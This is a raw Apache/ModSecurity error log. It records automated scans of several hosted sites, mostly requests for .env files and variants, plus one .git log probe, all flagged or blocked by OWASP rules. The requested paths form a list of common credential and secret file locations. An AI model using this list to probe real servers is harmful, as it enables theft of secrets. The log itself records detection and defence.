[Mon May 11 12:50:02.467172 2026] [security2:error] [pid 1256241:tid 1256256] [client 5.255.122.18:41504] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/.env.old"] [unique_id "agG0WpkIEwRJMyDaV55hzQAAAUo"]
[Mon May 11 12:50:02.467437 2026] [security2:error] [pid 1254328:tid 1254334] [client 5.255.122.18:41382] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/.env.local"] [unique_id "agG0WkRdw2n9wv6Ai48cEAAAAIM"]
[Mon May 11 12:50:02.467219 2026] [security2:error] [pid 1254179:tid 1254190] [client 5.255.122.18:41428] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/admin/.env"] [unique_id "agG0WmS6k_SCYd1AVZrE3QAAAQk"]
[Mon May 11 12:50:02.469058 2026] [security2:error] [pid 1254179:tid 1254190] [client 5.255.122.18:41428] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/admin/.env"] [unique_id "agG0WmS6k_SCYd1AVZrE3QAAAQk"]
[Mon May 11 12:50:02.469714 2026] [security2:error] [pid 1254133:tid 1254155] [client 5.255.122.18:41468] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/public/.env"] [unique_id "agG0WhjZymfuKpjWXeiRMgAAANM"]
[Mon May 11 12:50:02.464332 2026] [security2:error] [pid 1254242:tid 1254265] [client 5.255.122.18:41444] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/.env.staging"] [unique_id "agG0Wr4KNmD_mZ_vlf9OfQAAAFQ"]
[Mon May 11 12:50:02.470088 2026] [security2:error] [pid 1254133:tid 1254155] [client 5.255.122.18:41468] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/public/.env"] [unique_id "agG0WhjZymfuKpjWXeiRMgAAANM"]
[Mon May 11 12:50:02.470253 2026] [security2:error] [pid 1254242:tid 1254265] [client 5.255.122.18:41444] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/.env.staging"] [unique_id "agG0Wr4KNmD_mZ_vlf9OfQAAAFQ"]
[Mon May 11 12:50:02.476134 2026] [security2:error] [pid 1254212:tid 1254230] [client 5.255.122.18:41458] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/app/.env"] [unique_id "agG0WkYQeUtAPynIs6xs2AAAABA"]
[Mon May 11 12:50:02.476586 2026] [security2:error] [pid 1254179:tid 1254198] [client 5.255.122.18:41518] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/.env.test"] [unique_id "agG0WmS6k_SCYd1AVZrE3wAAARE"]
[Mon May 11 12:50:02.476599 2026] [security2:error] [pid 1254212:tid 1254230] [client 5.255.122.18:41458] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/app/.env"] [unique_id "agG0WkYQeUtAPynIs6xs2AAAABA"]
[Mon May 11 12:50:02.476749 2026] [security2:error] [pid 1254179:tid 1254198] [client 5.255.122.18:41518] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/.env.test"] [unique_id "agG0WmS6k_SCYd1AVZrE3wAAARE"]
[Mon May 11 12:50:02.475364 2026] [security2:error] [pid 1256241:tid 1256268] [client 5.255.122.18:41420] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/api/.env"] [unique_id "agG0WpkIEwRJMyDaV55h0AAAAVY"]
[Mon May 11 12:50:02.476990 2026] [security2:error] [pid 1256241:tid 1256268] [client 5.255.122.18:41420] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/api/.env"] [unique_id "agG0WpkIEwRJMyDaV55h0AAAAVY"]
[Mon May 11 12:50:02.473985 2026] [security2:error] [pid 1254179:tid 1254187] [client 5.255.122.18:41360] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/.env"] [unique_id "agG0WmS6k_SCYd1AVZrE3AAAAQY"]
[Mon May 11 12:50:02.477829 2026] [security2:error] [pid 1254179:tid 1254187] [client 5.255.122.18:41360] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/.env"] [unique_id "agG0WmS6k_SCYd1AVZrE3AAAAQY"]
[Mon May 11 12:50:02.476084 2026] [security2:error] [pid 1254133:tid 1254148] [client 5.255.122.18:41442] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/backend/.env"] [unique_id "agG0WhjZymfuKpjWXeiRMwAAAMw"]
[Mon May 11 12:50:02.466681 2026] [security2:error] [pid 1254328:tid 1254332] [client 5.255.122.18:41392] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/.env.development"] [unique_id "agG0WkRdw2n9wv6Ai48cEQAAAIE"]
[Mon May 11 12:50:02.478217 2026] [security2:error] [pid 1254133:tid 1254148] [client 5.255.122.18:41442] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/backend/.env"] [unique_id "agG0WhjZymfuKpjWXeiRMwAAAMw"]
[Mon May 11 12:50:02.478397 2026] [security2:error] [pid 1254328:tid 1254332] [client 5.255.122.18:41392] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/.env.development"] [unique_id "agG0WkRdw2n9wv6Ai48cEQAAAIE"]
[Mon May 11 12:50:02.481283 2026] [security2:error] [pid 1254133:tid 1254136] [client 5.255.122.18:41408] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agG0WhjZymfuKpjWXeiRLwAAAME"]
[Mon May 11 12:50:02.485185 2026] [security2:error] [pid 1254212:tid 1254219] [client 5.255.122.18:41394] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/.env.backup"] [unique_id "agG0WkYQeUtAPynIs6xs2QAAAAU"]
[Mon May 11 12:50:02.485394 2026] [security2:error] [pid 1254212:tid 1254219] [client 5.255.122.18:41394] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/.env.backup"] [unique_id "agG0WkYQeUtAPynIs6xs2QAAAAU"]
[Mon May 11 12:50:02.485666 2026] [security2:error] [pid 1254179:tid 1254188] [client 5.255.122.18:41290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agG0WmS6k_SCYd1AVZrE3gAAAQc"]
[Mon May 11 12:50:02.492938 2026] [security2:error] [pid 1254328:tid 1254333] [client 5.255.122.18:41378] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agG0WkRdw2n9wv6Ai48cEgAAAII"]
[Mon May 11 12:50:02.493812 2026] [security2:error] [pid 1256241:tid 1256256] [client 5.255.122.18:41504] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agG0WpkIEwRJMyDaV55hzQAAAUo"]
[Mon May 11 12:50:02.496674 2026] [security2:error] [pid 1254328:tid 1254334] [client 5.255.122.18:41382] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agG0WkRdw2n9wv6Ai48cEAAAAIM"]
[Mon May 11 12:50:02.507889 2026] [security2:error] [pid 1254133:tid 1254155] [client 5.255.122.18:41468] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agG0WhjZymfuKpjWXeiRMgAAANM"]
[Mon May 11 12:50:02.509548 2026] [security2:error] [pid 1254242:tid 1254249] [client 5.255.122.18:41366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agG0Wr4KNmD_mZ_vlf9OgQAAAEM"]
[Mon May 11 12:50:02.512667 2026] [security2:error] [pid 1254133:tid 1254148] [client 5.255.122.18:41442] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agG0WhjZymfuKpjWXeiRMwAAAMw"]
[Mon May 11 12:50:02.515184 2026] [security2:error] [pid 1254212:tid 1254230] [client 5.255.122.18:41458] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agG0WkYQeUtAPynIs6xs2AAAABA"]
[Mon May 11 12:50:02.515206 2026] [security2:error] [pid 1254242:tid 1254265] [client 5.255.122.18:41444] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agG0Wr4KNmD_mZ_vlf9OfQAAAFQ"]
[Mon May 11 12:50:02.515942 2026] [security2:error] [pid 1256241:tid 1256268] [client 5.255.122.18:41420] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agG0WpkIEwRJMyDaV55h0AAAAVY"]
[Mon May 11 12:50:02.516350 2026] [security2:error] [pid 1254179:tid 1254190] [client 5.255.122.18:41428] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agG0WmS6k_SCYd1AVZrE3QAAAQk"]
[Mon May 11 12:50:02.517220 2026] [security2:error] [pid 1254212:tid 1254219] [client 5.255.122.18:41394] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agG0WkYQeUtAPynIs6xs2QAAAAU"]
[Mon May 11 12:50:02.517473 2026] [security2:error] [pid 1254328:tid 1254332] [client 5.255.122.18:41392] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agG0WkRdw2n9wv6Ai48cEQAAAIE"]
[Mon May 11 12:50:02.517898 2026] [security2:error] [pid 1254179:tid 1254187] [client 5.255.122.18:41360] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agG0WmS6k_SCYd1AVZrE3AAAAQY"]
[Mon May 11 12:50:02.520861 2026] [security2:error] [pid 1254133:tid 1254156] [client 5.255.122.18:41296] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agG0WhjZymfuKpjWXeiRMAAAANQ"]
[Mon May 11 12:50:02.530091 2026] [security2:error] [pid 1254179:tid 1254198] [client 5.255.122.18:41518] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agG0WmS6k_SCYd1AVZrE3wAAARE"]
[Mon May 11 12:52:41.882192 2026] [security2:error] [pid 1254328:tid 1254352] [client 94.103.87.20:41620] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.la-grande-fabrique.com"] [uri "/wp-content/languages/\\"%s/\\""] [unique_id "agG0-URdw2n9wv6Ai48cygAAAJc"]
[Mon May 11 12:54:04.378730 2026] [authz_core:error] [pid 1256241:tid 1256256] [client 17.241.227.109:48842] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/block-supports/error_log
[Mon May 11 12:58:11.859629 2026] [security2:error] [pid 1254133:tid 1254146] [client 195.178.110.133:55914] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agG2QxjZymfuKpjWXeiSXwAAAMo"]
